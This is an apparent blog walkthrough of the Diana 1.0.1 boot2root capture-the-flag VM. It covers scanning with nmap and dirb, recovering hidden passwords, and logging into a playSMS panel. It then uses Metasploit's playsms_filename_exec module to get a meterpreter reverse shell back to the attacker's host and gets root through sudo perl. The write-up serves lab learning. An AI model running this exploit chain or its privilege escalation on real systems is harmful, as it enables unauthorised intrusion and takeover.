Diana: 1.0.1 CTF Walkthrough
Hii friends .. welcome 2 hackxsploit. Here is the complete walkthrough of Diana:1.0.1 CTF . It is beginner level CTF. Download it from here. This is Boot2Root - CTF VM. I hope you enjoy it
So let's crack.
Objective : Get the the Root access of System and Captute the flag.txt
Attacking Machine : Linux kali 4.17.0-kali1-amd64 Objective : Get the the Root access of System and Captute the flag.txt
Target machine : Diana 1.0.1 ip: 172.16.166.137
**It is recommended that use nmap , Dirb & nikto first for scan the ip **
--------------------------------------------------------------------------------------------------------------------------------
lets start from getting ip of Diana vm by this command;
# arp-scan -l
I have got my target Ip 172.16.166.137
Now scan the ip By nmap
# nmap 172.16.166.137 -sSCV
Now scan the ip By Dirb
# dirb http://172.16.166.137
now we are looking that port 80 is open so we browse our ip in browser.
now open http://172.16.166.137/robots.txt
here some directory is listed .
go to http://172.16.166.137/nothing/
it shows go back but the real game starts from here.
open the page source of this page we see the some password list.
copy this password in other place on text editor. (Remember this :-)
when we used dirb in 3rd step it showed me one more directory after scaning from dirb.
so open this directory http://172.16.166.137/secure/
we found a file named "backup.zip"
Download and open it. It's password is "freedom". Here we see a mp3 file but dont be confuse open this mp3 file with text editor.
it show the username and a directory where we can login.
Go to http://172.16.166.137/SecreTSMSgatwayLogin
A login page is opened.
here login id : touhid
password is : diana (from the password list that we have copied early)
here we are seeing the CMS is "playsms" which is vulnerable and give remote code execution.
so open the metasploit and search for "playsms"
msf> search playsms
msf> use exploit/multi/http/playsms_filename_exec
msf> options
msf> set set RHOST 172.16.166.137
msf> set TARGETURI /SecreTSMSgatwayLogin
msf> set USERNAME touhid
msf> set PASSWORD diana
msf> set LHOST 172.16.166.163 (its my local ip)
msf> exploit
woww... we got meterpreter.
type shell to go into shell.
here we cant go to root. so type this command:
python -c 'import pty; pty.spawn("/bin/sh")'
*** (its is used for spawn tty shell)
after it type this command:
sudo perl -e 'exec "/bin/sh";'
cd /root
cat flag.txt
finally we got our flag.
give your feedback and comments.
Prince Raj
princelucideus121@gmail.com
https://www.linkedin.com/in/rajprince/
Comments
Post a Comment